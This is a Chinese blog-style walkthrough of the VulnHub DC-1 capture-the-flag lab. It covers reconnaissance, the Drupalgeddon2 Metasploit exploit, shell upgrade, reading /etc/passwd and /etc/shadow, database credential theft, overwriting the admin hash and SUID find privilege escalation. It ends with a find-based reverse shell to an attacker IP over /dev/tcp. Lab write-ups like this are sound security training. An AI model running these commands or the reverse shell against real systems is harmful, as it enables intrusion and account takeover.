vulnhub靶机试验DC-1
前言
参考大佬的blog进行一次实践,入门级的学习,写得不好请见谅!
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
一. 环境搭建
1.准备工具
虚拟机Kali:
DC-1靶场机:
官网下载 https://download.vulnhub.com/dc/DC-1.zip
2.靶场准备
更改网络地址为网桥模式:
配置时取消的usb2.0配置,不然可能是virsual版本的问题,会报错。
二. 渗透过程
1. 信息收集
探测目标IP地址
先使用nmap,没有扫描到mac地址和更详细的信息,没法区别目标机
nmap -sP 192.168.3.0/24
接下下换netdiscover
sudo netdiscover -i eth0 -r 192.168.3.1/24
开了好几个虚拟机,排除找到目标机IP:192.168.3.112
探测目标IP开放端口
使用nmap探测靶机开放端口:可以看到开放22、80、111端口,确定有http服务。
nmap -sS 192.168.3.112
访问目标机地址:网页如下
2. 漏洞查找与利用
2.1弱口令
通过burp测试一下弱口令,爆不出来,而且需要认证,感觉好麻烦,试试cms相关漏洞。
2.2Drupalgeddon2
Searchsploit查一下Drupal7相关漏洞:
(官方指南:Exploit Database SearchSploit Manual)
searchsploit 使用参考 https://blog.csdn.net/qq_38243607/article/details/107140817
msfconsole
开启msf查找一下可以利用的漏洞:先选择Rank‘excellent’、Check‘Yes’和日期最新的利用,与searchsploit结果对比一下,发现可以选择no.1。
3. Getshell
3.1交互式shell
使用 python 的 pty 来转换为 交互式shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
3.2flag1
Shell后先ls一下看看,发现一个flag1.txt:
cat查看一下,大概意思是提示所有cms需要配置文件,所以让我们去找drupal的配置文件。
3.3Linux信息收集
先不急着找配置文件,既然已经进来了就收集一波信息
1>DNS客户机配置文件(虽然对于这次靶场没啥用)
cat /etc/resolv.conf
2>系统用户配置文件
cat /etc/passwd
哦吼,发现了一个flag4,路径是/home/flag4,那就提前看一下flag4的内容好了:
翻译一下大概是说“用同样的方法找到存在root里的flag”,不明所以,不过应该要求我们提权(一会再搞)。
3>查存储的用户密码信息:没有权限
cat /etc/shadow
4>我是谁:
Whoami/who -a
5>查看进程信息:
发现了mysql进程,一会试试爆库。
ps aux
6>简单看一下刚进来时各个文件夹内都有什么文件:
4. 数据库渗透
4.1flag2,数据库用户密码
简单过一遍linux信息后,回来根据提示去找drupal配置文件。
根据相关链接:
Step 3: Create settings.php and the files directory | Installing Drupal 7 | Drupal Wiki guide on Drupal.org
https://toutiao.io/posts/vam02/preview
我们可以知道Drupal会在sites/default/files目录下写入各种文件,而default.settings.php为Drupal的样本配置文件,安装时需将其复制并命名为‘settings.php’,所以现在应该去找到这个文件。
首先进入sites/default/files,逛了一圈没有东西:
返回上级目录,发现了settings.php:
查看settings.php文件内容:嘿嘿,找到了flag2,同时还发现了数据库用户及密码。
4.2数据库信息收集
使用刚刚得到的用户密码登录数据库:
查看表信息:发现一个users表
查看users表信息,发现用户密码:
(加密的密码试试破解)
5. 用户密码爆破
5.1hash解密(失败)
先用kali自带的hash工具过一下密码(加盐了没用)
加了盐没办法,不过根据打过的红日3靶场可以试试其他方法,即新建新的用户密码或修改已有的密码。
5.2修改密码(成功),flag3
网上搜一搜drupal修改密码,发现Drupal 7已不再采用Drupal 6和5时代的简单的MD5加密了而是采用了新型的Hash加密方法来确保密码安全。而加密脚本是password-hash.sh。
巧了,之前搜集信息时恰好在scripts目录下发现了该脚本。
当然也可以使用find找一下:
find / -name ‘hash’
通过该脚本新设置一个密码‘123456’:
scripts/password-hash.sh ‘123456’> test.txt
再次进入数据库更新一下admin的密码:
update users set pass=’you-password’ where uid=1;
翻车,没有搜索到flag3
6. Linux提权
6.1find 指令提权
首先找一下find路径:
which find
再检查一下find是否有suid权限:
ls -l /usr/bin/find
最后使用find命令执行一下‘whoami’发现是root权限:
touch getrootfind / -type f -name getroot -exec “whoami” \;
6.2find命令nc监听反弹shell
先在kali上开启nc监听:
nc -lvvnp 6666
Msf中执行构建好的find命令:
find /etc/passwd -exec bash -ip>& /dev/tcp/192.168.3.172/6666 0>&1 \;
id
cd /root
ls
参考:https://blog.csdn.net/ierciyuan/article/details/127282461
vulnhub靶机试验DC-1相关推荐
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- Vulnhub靶机:EVILBOX_ ONE(很详细)
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
- VMware检测不到vulnhub靶机IP地址解决办法
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 vulnhub靶机检测不到IP地址解决办法 原因一:查看网络适配器是否为NAT模式 原因二:虚拟网络编辑器配置出错 原因三:靶机网卡配 ...
- VulnHub靶机-Jangow: 1.0.1
NO.1 VulnHub靶机-Jangow: 1.0.1 迟到的文章,就当库存发出来吧~ by AnQtroops 2022.9.10 0x00 靶机信息 1.下载地址:https://www.vul ...
最新文章
- OpenCV3.0中的离散傅里叶变换
- Singing Superstar 字符串哈希-map操作
- 对拉格朗日乘子法与KKT的理解
- 功能自动化工具watiJ(转载)
- Struts2拦截器实现异常处理机制
- 移动应用开发——作业3
- Jeecg入门篇,高手掠过
- 项目管理九大知识点输入输出
- DTO,VO,POJO,JavaBeans之间的区别?
- 一题多解 —— 同时找到序列的最大值最小值
- linux 正则表达式
- OAuth2.0+SpringSecurity+Jwt实现系统的登录认证,用户授权
- python模块中函数的用法_怎么使用help函数查看python模块中函数的用法
- godis之aof持久化
- 设备驱动安装不上怎么办?
- 约当标准型_约当标准形矩阵对应的“基”是什么?
- ACM-ICPC国际大学生程序设计竞赛亚洲区大连赛区(2016)地区赛——花开花落终有时
- Windows:忘记本地账户开机密码,但记得住PIN码
- 微信小程序连接阿里云物联网平台——物联网远程控制开发1
- 跨平台AR增强现实开发(一)(AR开发环境的搭建)
热门文章
- C++【10】构造函数、析构函数何时被调用?
- 程序员该如何爱老婆,对老婆好
- 设置log4j2自动删除过期日志
- SEO思维赚钱模式解读-海瑶SEO学堂
- MODIS MCD12Q1数据批量提取
- 机器学习讲堂 sklearn.svm包中的SVC(kernel=”linear“)和LinearSVC的区别
- php发送邮件不成功,关于thinkphp 发送邮件不成功的问题
- SRM 611 div2
- [前端开发] 未来趋势“无后端”的web应用开发模式
- Audition测试项目制作